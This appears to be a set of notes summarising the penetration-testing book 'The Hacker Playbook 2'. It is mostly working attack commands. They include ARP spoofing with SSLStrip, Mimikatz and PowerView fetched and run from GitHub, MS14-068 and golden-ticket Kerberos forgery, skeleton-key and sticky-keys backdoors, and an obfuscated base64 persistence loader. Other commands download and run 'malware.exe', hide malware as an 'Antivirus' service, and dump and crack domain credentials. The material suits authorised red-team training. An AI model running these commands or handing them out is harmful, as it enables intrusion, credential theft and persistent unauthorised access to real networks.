The Hacker Playbook 2

Disclaimer

Because of the book's release date, everything here needs further testing. Don't take anything here and expect it to work off the bat.

Scanning the Network

Passive Discovery Checklist

Creating Password Lists

Tools Checklist

Data Collection

Github Sensitive Info

External/Internal Active Discovery

  • Scanning with Masscan
  • Scanning with Sparta
  • Scanning with HTTP Screenshot
  • Scanning with Eyewitness/WMAP

Vulnerability Scanning

  • Scanning using Nexpose/Nessus/OpenVAS

Web Application Scanning

  • Scanning with Burp Proxy Pro (spider/discover content/active scanner)
  • Scanning with ZAP Proxy
  • Parsing Output (discover)

Injection

  • Burp pro with SQLMap API
  • Sqlmap
  • Sqlninja
  • NoSqlmap

CMS - Content Management Systems

  • CMSmap
  • Wpscan

XSS

  • BeeF

Moving in the Network

No Credentials

MITM and Sidejacking

  • Hamster/Ferret
# enable IP forwarding:
echo "1" > /proc/sys/net/ipv4/ip_forward

# modify IP tables for SSL Strip:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000

# configure and run SSL Strip:
sslstrip -f -a -k -l 1000 -w /root/out.txt &

# enable ARP spoof (remember this will ARP spoof everyone on the network):
arpspoof -i eth0 [gateway]

# enable Ferret. In a new terminal window:
ferret -i eth0

# enable Hamster. In a new terminal window:
hamster

DNS Redirection

  • Cain & Abel with SET

SSLStrip

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080
# ARP-poison only the victim (192.168.0.12) and the gateway (192.168.0.1), not the whole segment:
ettercap -TqM arp:remote /192.168.0.12/ /192.168.0.1/

Non-admin Credentials

Windows Enumeration

whoami /all && ipconfig /all && netstat -ano && net accounts && net localgroup administrators && net share

# Check Window Patches
powershell.exe -command Get-HotFix

# Display All AD Users and Associated Information
Powershell.exe -NoP -NonI -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1'); Get-NetUser"

Powershell.exe -NoP -NonI -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1'); Get-UserProperties -Properties name,memberof,description,info"

wmic useraccount get /ALL /format:csv

# Enable Remote Desktop (requires administrative privileges)
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0

# Enable Firewall for Remote Desktop
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

# Add a firewall rule
powershell.exe -command New-NetFirewallRule -DisplayName "Allow Inbound Port 80" -Direction Inbound -LocalPort 80 -Protocol TCP -Action Allow

powershell.exe -command New-NetFirewallRule -DisplayName "Block Outbound Port 80" -Direction Outbound -LocalPort 80 -Protocol TCP -Action Block

# View all services
powershell.exe -command Get-Service

# Restart a service
powershell.exe -command Restart-Service [ServiceName]

# Configure the DNS server (Set-DnsClientServerAddress, not Get-Service)
powershell.exe -command Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 8.8.8.8

# Get a Process Listing
powershell.exe -command Get-Process
wmic process get caption,executablepath,commandline /format:csv

# Get a list of all computers from Active Directory
Powershell.exe -NoP -NonI -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1'); Get-NetComputers"

# Collection of information from the system, registries, and other information
Powershell.exe -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/nishang/master/Gather/Get-Information.ps1'); Get-Information"

# Search the network for which computers the Domain Admins are using
Powershell.exe -NoP -NonI -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1'); Invoke-UserHunter"

# Find out which computer a specific AD user is on. In this example, we look for the domain user "domainA", who is a domain administrator
Powershell.exe -NoP -NonI -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1'); Invoke-UserHunter -UserName 'domainA'"

# Finding Open Shares
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1'); Invoke-ShareFinder -ExcludeIPC -ExcludePrint -CheckShareAccess | Out-File -Encoding ascii found_shares.txt"

# List all the open shares on the network (very loud)
Powershell.exe -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1'); Invoke-Netview"

# List of all Active Directory users and the associated information with their accounts
Powershell.exe -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1'); Get-UserProperties -Properties name,memberof,description,info"

# Automate post exploitation information gathering
Powershell.exe -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/nishang/master/Gather/Get-Information.ps1'); Get-Information"

# Get Local Windows Accounts
wmic useraccount get /ALL /format:csv

# Find Domain Controllers
nltest /DCLIST:[Domain]

# List Domain Admins, and the members of the Administrators group on the domain controller
net group "Domain Admins" /domain
net localgroup administrators /DOMAIN

Domain Trusts

# Show the relationship between the different domain trusts
Powershell.exe -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1'); Invoke-MapDomainTrusts | Export-CSV -NoTypeInformation trusts.csv"

# Find information about members of a given local group
Powershell.exe -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1'); Get-NetLocalGroup -HostName it.rockets.testlab"

Group Policy Preferences

# msf
use post/windows/gather/credentials/gpp
set SESSION [Session # of your shell]
exploit

https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb

https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1

# mount
\\[Domain Controller]\SYSVOL\[Domain]\Policies

OS X Enumeration

OSXCollector

Admin Credentials

  • psexec (in meterpreter: ps, migrate, getsystem, then load mimikatz and run kerberos/wdigest)
  • psexec_command, useful commands to run:
    net group "Domain Admins" /domain   (list all Domain Admins)
    qwinsta   (list user session information)
    Create additional administrative accounts on all hosts:
    net user username password /ADD /DOMAIN
    net group "Domain Admins" username /ADD /DOMAIN
    net localgroup Administrators username /ADD

Move Laterally With WMI

wmic /USER:"hacker\testuser1" /PASSWORD:"!Asdfasdfasdf1!" /NODE:172.16.151.201 process call create "powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt"

Powershell.exe -NoP -NonI -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1'); 'win7','win8' | Invoke-MassMimikatz -Verbose -FireWallRule"

Kerberos - MS14-068

git clone https://github.com/bidord/pykek /opt/pykek/
apt-get install krb5-user
apt-get install rdate
rdate -n [Domain Controller]   # sync the clock with the DC; Kerberos rejects requests with more than a few minutes of skew
echo 172.16.151.200 dc.hacker.testlab >> /etc/hosts

# four pieces of information
-u username@domain [example: limiteduser@hacker.testlab]
-d domain controller [example: dc.hacker.testlab]
-p password
-s SID of the user [example: S-1-5-21-3525058729-1821581466-2040179600-1111]

# get sid
whoami /user

cd /opt/pykek/
python ms14-068.py -d dc.hacker.testlab -u limiteduser@hacker.testlab -s S-1-5-21-3525058729-1821581466-2040179600-1111 -p '!Asdfasdfasdf1!'

cp TGT_limiteduser@hacker.testlab.ccache /tmp/krb5cc_0

smbclient -k -W hacker.testlab //dc.hacker.testlab/c$

# do a dir \\dc\c$ and have full access to the victim host

Pass-The-Ticket

mimikatz

privilege::debug
sekurlsa::tickets /export

kerberos::ptt [0;ab9bf]-2-1-40e10000-lab@krbtgt-HACKER.TESTLAB.kirbi

Lateral Movement With Postgres SQL

Pulling Cached Credentials

use post/windows/gather/cachedump
set SESSION 1
exploit

oclHashcat64.exe -m 2100 hashes\mscash2.txt lists\crackstat_realhuman_phill.txt
oclHashcat64.exe -m 2100 hashes\mscash2.txt lists\crackstat_realhuman_phill.txt -r rules\InsidePro-HashManager.rule --force

Attacking the Domain Controller

  • SMBExec
msf > use auxiliary/admin/smb/psexec_ntdsgrab
msf auxiliary(psexec_ntdsgrab) > show actions
    ...actions...
msf auxiliary(psexec_ntdsgrab) > set ACTION < action-name >
msf auxiliary(psexec_ntdsgrab) > show options
    ...show and set options...
msf auxiliary(psexec_ntdsgrab) > run

esedbexport -t [Location of Export] [NTDS.dit file]
dshashes.py [datatable table] [link_table] --passwordhashes [original bin file from ntdsgrab]

Persistence

  • Veil
%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('nVRtb9pIEP7OrxhZe5KtYMe8NE2wIpWSps1doTSk...pKRtsdc50r/fbvydssrxWXDNcdcIwpKMbetG0bth1qazIMKBVRaPzejRFMOSmSLmkuQx0vnZZ3oSwCdOXjZ65bEWbREan7XpeE/YgVWl05fCXQ4hNtmpWR1htnC6tr0pJstn9VvyJRMxp8TDWpOvTk24Ybmn8cbrZ/gI=')))), [IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd();"
  • Golden Ticket
# information needed
# Domain
whoami

# Domain Admin User
net group "Domain Admins" /domain

# Domain SID: the user's SID with its last component removed (the RID after the final dash; it is not always four digits)
whoami /user

# NTLM hash of krbtgt (dump it from the DC with domain admin credentials, e.g.
# secretsdump.py hacker/lab@dc.hacker.testlab -just-dc-user krbtgt)
secretsdump.py

use kiwi

golden_ticket_create -u <Domain Admin Username> -d <Domain> -k <krbtgt hash> -s <Domain SID> -t <Location to Drop Golden Ticket>

kerberos_ticket_list

kerberos_ticket_purge

kerberos_ticket_use /opt/ticket.txt

shell

dir \\DC\c$

# check if worked, use wmi to execute command remotely
wmic /authority:"Kerberos:hacker.testlab\win8" /node:win8 process call create "cmd /c ping 127.0.0.1 > C:\log.txt"
  • Skeleton Key
mimikatz.exe "privilege::debug" "misc::skeleton" exit

# log on to host using backdoored password “mimikatz”, or do something like
net use * \\dc\c$ mimikatz /user:lab@hacker.testlab
  • Sticky Keys
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0

# Allow RDP
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

# Enable Remote Desktop Connections
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# above commands can be executed by wmi (need local admin)
wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\windows\system32\cmd.exe\" /f"

wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f"

wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" /v SecurityLayer /t REG_DWORD /d 0 /f"

wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes"

wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"

# RDP to that host without any credentials, hit shift 5 times, and get a system shell
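Both the MS14-068 step (pykek's -s) and the golden ticket step (kiwi's golden_ticket_create -s) take a SID read from whoami /user, but not the same one: pykek wants the user's full SID including the RID, while the golden ticket wants the domain SID, which is the user SID with the trailing RID removed. As an added example (not from the book), the Python helper below pulls the SID out of whoami /user output, splits it, and builds both command lines with the right value in each. The whoami output and the krbtgt hash value are constructed samples reusing the book's lab names; the function names are the example's own.

```python
"""Pick the right SID for each Kerberos attack step. Added example, not from
the book: pykek (MS14-068) takes the user's full SID, kiwi's
golden_ticket_create takes the domain SID (user SID without the trailing RID)."""
import re

# Constructed sample of `whoami /user` output, using the book's lab SID.
SAMPLE_WHOAMI = """
USER INFORMATION
----------------

User Name           SID
=================== ==============================================
hacker\\limiteduser  S-1-5-21-3525058729-1821581466-2040179600-1111
"""

# S-1-5-21-<three sub-authorities>-<RID>; the RID is not always four digits.
ACCOUNT_SID_RE = re.compile(r"S-1-5-21-\d+-\d+-\d+-\d+")

# RIDs that identify built-in principals in every domain.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt",
                   512: "Domain Admins", 513: "Domain Users", 519: "Enterprise Admins"}

def sid_from_whoami(output: str) -> str:
    """Extract the account SID from `whoami /user` output.
    Caveat: a local account also has an S-1-5-21-... SID (the machine's), so run
    whoami as the domain user whose domain you actually want."""
    m = ACCOUNT_SID_RE.search(output)
    if m is None:
        raise ValueError("no S-1-5-21 account SID found in whoami /user output")
    return m.group(0)

def split_sid(sid: str) -> tuple:
    """Return (domain SID, RID). Rejects anything that is not a full account SID."""
    parts = sid.split("-")
    if (len(parts) != 8 or parts[:4] != ["S", "1", "5", "21"]
            or not all(p.isdigit() for p in parts[1:])):
        raise ValueError(f"not an S-1-5-21 account SID: {sid}")
    return "-".join(parts[:-1]), int(parts[-1])

def describe_rid(rid: int) -> str:
    return WELL_KNOWN_RIDS.get(rid, f"RID {rid} (domain-created account or group)")

def ms14_068_argv(upn: str, dc: str, user_sid: str, password: str) -> list:
    """pykek wants the *user* SID: the forged PAC is built for that account."""
    split_sid(user_sid)                       # validate; raises on a bare domain SID
    return ["python", "ms14-068.py", "-d", dc, "-u", upn, "-s", user_sid, "-p", password]

def golden_ticket_cmd(da_user: str, domain: str, krbtgt_ntlm: str, user_sid: str,
                      out: str = "/opt/ticket.txt") -> str:
    """kiwi wants the *domain* SID: strip the RID from any account SID in that domain."""
    if not re.fullmatch(r"[0-9a-fA-F]{32}", krbtgt_ntlm):
        raise ValueError("krbtgt hash must be the 32-hex-char NT hash from secretsdump")
    domain_sid, _rid = split_sid(user_sid)
    return (f"golden_ticket_create -u {da_user} -d {domain} -k {krbtgt_ntlm} "
            f"-s {domain_sid} -t {out}")

if __name__ == "__main__":
    sid = sid_from_whoami(SAMPLE_WHOAMI)
    print(split_sid(sid), describe_rid(split_sid(sid)[1]))
    print(" ".join(ms14_068_argv("limiteduser@hacker.testlab", "dc.hacker.testlab", sid, "!Asdfasdfasdf1!")))
    print(golden_ticket_cmd("lab", "hacker.testlab", "0" * 32, sid))   # placeholder hash
```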

Social Engineering

  • Doppelganger Domains
  • SMTP Attack
  • SSH Attack
  • Phishing (Manual Phishing Code)
  • Web Filtering Bypass for Your Domains - set up the doppelganger domain's CNAME to point at the target domain, leave it for weeks so the web filter categorizes it like the target, then point the record back at your own IP and use SET to host a cloned auth page
  • MS Excel Macro

Attacks That Require Physical Access

  • Exploiting Wireless (kismet)
  • Active Attacks (aircrack-ng)
  • WEP (Fern-Wi-Fi-Cracker)
  • WPAv2 (TKIP) - Wi-Fi Protected Access (Wifite, WifiPhisher)
  • Badge Cloning (Proxmark 3 Get It Working In Kali Nethunter)

Windows/OSX Exploit

  • Kon-Boot
  • Rubber Ducky

Drop Box

  • Raspberry Pi 2

Evading AV

Password Crack

  • Prince

Vulnerability Search

Windows Sniffer

netsh trace start capture=yes overwrite=no tracefile=C:\Users\Public\sniff.etl
netsh trace stop

# convert the ETL trace to a cap file (requires Microsoft Message Analyzer and its PEF PowerShell module)
powershell -exec bypass -command "Import-Module PEF; $s = New-PefTraceSession -Path 'C:\Users\Public\OutFile.cap' -SaveOnStop; $s | Add-PefMessageProvider -Provider 'C:\Users\Public\sniff.etl'; $s | Start-PefTraceSession"

# load the cap file into Wireshark, save it as pcap, then extract credentials from it
python net-creds.py -p [pcap file]

Bypass UAC

# got a session
use exploit/windows/local/bypassuac_injection
set target 1
set PAYLOAD windows/x64/meterpreter/reverse_https
exploit

Kali Linux Nethunter

Building A Custom Reverse Shell

Evading Application Based Firewalls

Powershell

python ./easy-p
7 - Base64 Encode
1 - From File
/opt/PowerShell_Popup/popup.ps1

Windows 7/8 Uploading Files To The Host

cmd.exe /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.securepla.net/malware.exe','malware.exe');(New-Object -com Shell.Application).ShellExecute('malware.exe')"

cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://www.securepla.net/malware.exe c:\malware.exe & start c:\malware.exe"

Pivoting

  • Autoroute and Auxiliary Scan
run autoroute -s 192.168.1.0/24
run autoroute -p
background
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.127
set PORTS 135,139,445
set THREADS 20
exploit

use auxiliary/scanner/discover/udp_probe
use exploit/windows/smb/psexec
  • Socks Proxy
route add 192.168.1.0 255.255.255.0 4
route print
use auxiliary/server/socks4a
run

gedit /etc/proxychains.conf
# set the socks4 line to "socks4 127.0.0.1 1080" (the port the socks4a module listens on by default)
proxychains nmap -sT -Pn -p135,139,445 192.168.1.127
  • Move Laterally with Hashes
use exploit/windows/smb/psexec_psh   (or exploit/windows/smb/psexec; set SMBPass to the LM:NTLM hash)
  • Moving Laterally with NTLM Hashes
# from a SYSTEM-level meterpreter session, upload WCE and drop into a shell:
upload /opt/wce.exe C:\\users\\public
shell
cd \users\public
# list the NTLM hashes of the current logon sessions
wce -l
# replace the current session's credentials (format user:domain:LMhash:NThash), then use them over SMB
wce.exe -s [user:domain:LM:NTLM]
net use * \\dc\c$ /user:hacker\lab
  • Moving Laterally with WMI
wmic /USER:"hacker\testuser1" /PASSWORD:"!Asdfasdfasdf1!" /NODE:172.16.151.201 process call create "powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt"
dir \\win8\c$\Users\Public\
type \\win8\c$\Users\Public\a.txt
del \\win8\c$\Users\Public\a.txt
  • Moving Laterally Using Services
copy malware.exe \\[Remote Machine]\C$\users\public

# create a service called Antivirus make sure to add the space between binpath= and your executable.
sc \\[Remote Machine] create Antivirus binpath= "c:\users\public\malware.exe"
sc \\[Remote Machine] start Antivirus
  • Proxy Between Hosts

One of the cheap and easy ways to proxy between hosts in segmented networks is to use a built-in Windows feature. Netsh is a command-line tool for modifying network configuration. The following command puts the host in listening mode on port 8080 and redirects every connection to 192.168.5.33 on port 3389, an easy way to proxy RDP traffic to other hosts. Remember that you need elevated privileges to run these commands.

The great part about the netsh port proxy is that it also supports IPv4-to-IPv6 proxying. You can take one of the compromised hosts and proxy your RDP requests into that segmented network.

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=3389 connectaddress=192.168.5.33

# configure the port proxy on a remote host instead (needs local admin there; setting LocalAccountTokenFilterPolicy=1 lets a local admin account get a full token over the network, and netsh's "set machine" needs the Remote Registry service running on the target)
reg add \\<Remote IP>\HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
sc \\<Remote IP> start remoteregistry
sc \\<Remote IP> start remoteaccess
netsh
set machine <Remote IP>
interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=3389 connectaddress=192.168.5.33

# for linux
mknod backpipe p
nc -l -p 8080 0<backpipe | nc 10.0.18.134 3389 | tee backpipe

Commercial Tools

  • Cobalt Strike
  • Immunity Canvas
  • Core Impact
